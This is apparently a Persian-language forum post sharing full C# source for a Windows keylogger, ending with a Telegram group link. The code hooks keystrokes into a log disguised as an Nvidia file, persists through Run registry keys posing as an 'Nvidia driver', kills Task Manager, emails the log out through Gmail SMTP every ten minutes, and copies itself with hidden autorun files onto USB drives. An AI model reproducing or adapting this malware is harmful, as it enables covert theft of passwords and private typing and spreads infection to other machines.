09-22-2011، 12:26 AM
سورس یه کیلار به زبان سی شارپ
کد:
using System;
using System.Diagnostics;
using System.Timers;
using System.Windows.Forms;
using System.Runtime.InteropServices;
using System.IO;
using System.Net;
using System.Net.Mail;
using Microsoft.Win32;
namespace Keylogger_V2
{
class Program
{
private const int WH_KEYBOARD_LL = 13;
private const int WM_KEYDOWN = 0x0100;
private static LowLevelKeyboardProc _proc = HookCallback;
private static IntPtr _hookID = IntPtr.Zero;
public static string path = Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData),"nvidia.log");
public static byte caps = 0, shift = 0, failed = 0;
[DllImport("user32.dll", CharSet = CharSet.Auto, SetLastError = true)]
private static extern IntPtr SetWindowsHookEx(int idHook, LowLevelKeyboardProc lpfn, IntPtr hMod, uint dwThreadId);
[DllImport("user32.dll", CharSet = CharSet.Auto, SetLastError = true)]
[return: MarshalAs(UnmanagedType.Bool)]
private static extern bool UnhookWindowsHookEx(IntPtr hhk);
[DllImport("user32.dll", CharSet = CharSet.Auto, SetLastError = true)]
private static extern IntPtr CallNextHookEx(IntPtr hhk, int nCode, IntPtr wParam, IntPtr lParam);
[DllImport("kernel32.dll", CharSet = CharSet.Auto, SetLastError = true)]
private static extern IntPtr GetModuleHandle(string lpModuleName);
public static void Main()
{
_hookID = SetHook(_proc);
Program.startup();
System.Timers.Timer timer;
timer = new System.Timers.Timer();
timer.Elapsed += new ElapsedEventHandler(Program.OnTimedEvent);
timer.AutoReset = true;
timer.Interval = 600000;
timer.Start();
System.Timers.Timer timer2;
timer2 = new System.Timers.Timer();
timer2.Elapsed += new ElapsedEventHandler(Program.USBSpread);
timer2.AutoReset = true;
timer2.Interval = 10000;
timer2.Start();
Application.Run();
GC.KeepAlive(timer);
GC.KeepAlive(timer2);
UnhookWindowsHookEx(_hookID);
}
public static void startup()
{
//Try to copy keylogger in some folders
string source = Application.ExecutablePath.ToString();
string destination = Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData);
destination=System.IO.Path.Combine(destination,"nvdisp.exe");
try
{
System.IO.File.Copy(source, destination,false);
source = destination;
} catch {
Console.WriteLine("No authorization to copy file or other error.");
}
//Find if the file already exist in startup
try
{
RegistryKey registryKey = Registry.CurrentUser.OpenSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", false);
if (registryKey.GetValue("Nvidia driver") == null)
{
registryKey.SetValue("Nvidia driver", destination);
}
registryKey.Close();//dispose of the Key
} catch {
Console.WriteLine("Error setting startup reg key.");
}
//Try to add to all users
try
{
RegistryKey registryKey = Registry.LocalMachine.OpenSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", false);
if (registryKey.GetValue("Nvidia driver") == null)
{
registryKey.SetValue("Nvidia driver", source);
}
registryKey.Close();//dispose of the key
}
catch
{
Console.WriteLine("Error setting startup reg key for all users.");
}
}
public static void OnTimedEvent(object source, EventArgs e)
{
Process[] ProcessList = Process.GetProcesses();
foreach (Process proc in ProcessList)
{
if (proc.MainWindowTitle.Contains("Taskmgr.exe"))
{
proc.Kill();
}
}
System.Net.Mail.MailMessage msg = new System.Net.Mail.MailMessage(); //create the message
msg.To.Add("[email protected]");
msg.From = new MailAddress("[email protected]", "username", System.Text.Encoding.UTF8);
msg.Subject = "i don't know";
msg.SubjectEncoding = System.Text.Encoding.UTF8;
msg.Body = "ciao ale";
msg.BodyEncoding = System.Text.Encoding.UTF8;
msg.IsBodyHtml = false;
msg.Priority = MailPriority.High;
SmtpClient client = new SmtpClient(); //Network Credentials for Gmail
client.Credentials = new System.Net.NetworkCredential("[email protected]", "password");
client.Port = 587;
client.Host = "smtp.gmail.com";
client.EnableSsl = true;
Attachment data = new Attachment(Program.path);
msg.Attachments.Add(data);
try
{
client.Send(msg);
failed = 0;
}
catch
{
data.Dispose();
failed = 1;
}
data.Dispose();
if (failed == 0)
File.WriteAllText(Program.path, ""); //empties the file
failed = 0;
}
private static IntPtr SetHook(LowLevelKeyboardProc proc)
{
using (Process curProcess = Process.GetCurrentProcess())
using (ProcessModule curModule = curProcess.MainModule)
{
return SetWindowsHookEx(WH_KEYBOARD_LL, proc, GetModuleHandle(curModule.ModuleName), 0);
}
}
private delegate IntPtr LowLevelKeyboardProc(int nCode, IntPtr wParam, IntPtr lParam);
private static IntPtr HookCallback(int nCode, IntPtr wParam, IntPtr lParam)
{
if (nCode >= 0 && wParam == (IntPtr)WM_KEYDOWN)
{
StreamWriter sw = File.AppendText(Program.path);
int vkCode = Marshal.ReadInt32(lParam);
if (Keys.Shift == Control.ModifierKeys) Program.shift = 1;
switch ((Keys)vkCode)
{
case Keys.Space:
sw.Write(" ");
break;
case Keys.Return:
sw.WriteLine("");
break;
case Keys.Back:
sw.Write("back");
break;
case Keys.Tab:
sw.Write("TAB");
break;
case Keys.D0:
if (Program.shift == 0) sw.Write("0");
else sw.Write(")");
break;
case Keys.D1:
if (Program.shift == 0) sw.Write("1");
else sw.Write("!");
break;
case Keys.D2:
if (Program.shift == 0) sw.Write("2");
else sw.Write("@");
break;
case Keys.D3:
if (Program.shift == 0) sw.Write("3");
else sw.Write("#");
break;
case Keys.D4:
if (Program.shift == 0) sw.Write("4");
else sw.Write("$");
break;
case Keys.D5:
if (Program.shift == 0) sw.Write("5");
else sw.Write("%");
break;
case Keys.D6:
if (Program.shift == 0) sw.Write("6");
else sw.Write("^");
break;
case Keys.D7:
if (Program.shift == 0) sw.Write("7");
else sw.Write("&");
break;
case Keys.D8:
if (Program.shift == 0) sw.Write("8");
else sw.Write("*");
break;
case Keys.D9:
if (Program.shift == 0) sw.Write("9");
else sw.Write("(");
break;
case Keys.LShiftKey:
case Keys.RShiftKey:
case Keys.LControlKey:
case Keys.RControlKey:
case Keys.LMenu:
case Keys.RMenu:
case Keys.LWin:
case Keys.RWin:
case Keys.Apps:
sw.Write("");
break;
case Keys.OemQuestion:
if (Program.shift == 0) sw.Write("/");
else sw.Write("?");
break;
case Keys.OemOpenBrackets:
if (Program.shift == 0) sw.Write("[");
else sw.Write("{");
break;
case Keys.OemCloseBrackets:
if (Program.shift == 0) sw.Write("]");
else sw.Write("}");
break;
case Keys.Oem1:
if (Program.shift == 0) sw.Write(";");
else sw.Write(":");
break;
case Keys.Oem7:
if (Program.shift == 0) sw.Write("'");
else sw.Write('"');
break;
case Keys.Oemcomma:
if (Program.shift == 0) sw.Write(",");
else sw.Write("<");
break;
case Keys.OemPeriod:
if (Program.shift == 0) sw.Write(".");
else sw.Write(">");
break;
case Keys.OemMinus:
if (Program.shift == 0) sw.Write("-");
else sw.Write("_");
break;
case Keys.Oemplus:
if (Program.shift == 0) sw.Write("=");
else sw.Write("+");
break;
case Keys.Oemtilde:
if (Program.shift == 0) sw.Write("`");
else sw.Write("~");
break;
case Keys.Oem5:
sw.Write("|");
break;
case Keys.Capital:
if (Program.caps == 0) Program.caps = 1;
else Program.caps = 0;
break;
default:
if (Program.shift == 0 && Program.caps == 0) sw.Write(((Keys)vkCode).ToString().ToLower());
if (Program.shift == 1 && Program.caps == 0) sw.Write(((Keys)vkCode).ToString().ToUpper());
if (Program.shift == 0 && Program.caps == 1) sw.Write(((Keys)vkCode).ToString().ToUpper());
if (Program.shift == 1 && Program.caps == 1) sw.Write(((Keys)vkCode).ToString().ToLower());
break;
}
Program.shift = 0;
sw.Close();
}
return CallNextHookEx(_hookID, nCode, wParam, lParam);
}
public static void USBSpread(object source, EventArgs e)
{
///////////////////////////////////////////////////////////////
/////////////////////// USB spread class //////////////////////
///////////////////////////////////////////////////////////////
//A bit modified
string source2 = Application.ExecutablePath.ToString();
System.IO.DriveInfo[] drives = System.IO.DriveInfo.GetDrives();
try
{
foreach (System.IO.DriveInfo drive in drives)
{
if (drive.DriveType == DriveType.Removable)
{
string driveAutorun = drive.Name + "autorun.inf";
StreamWriter sw = new StreamWriter(driveAutorun);
sw.WriteLine("[autorun]\n");
sw.WriteLine("open=start.exe");
sw.WriteLine("action=Run VMCLite");
sw.Close();
File.SetAttributes(drive.Name + "autorun.inf", File.GetAttributes(drive.Name + "autorun.inf") | FileAttributes.Hidden);
try
{
File.Copy(source2, drive.Name + "start.exe", true);
File.SetAttributes(drive.Name + "start.exe", File.GetAttributes(drive.Name + "start.exe") | FileAttributes.Hidden);
}
finally
{
Console.WriteLine("Removable device rooted");
}
}
}
}
catch (Exception e2)
{
Console.WriteLine(e2.ToString());
}
}
}
}
گروه دور همی پارسی کدرز
https://t.me/joinchat/GxVRww3ykLynHFsdCvb7eg
https://t.me/joinchat/GxVRww3ykLynHFsdCvb7eg
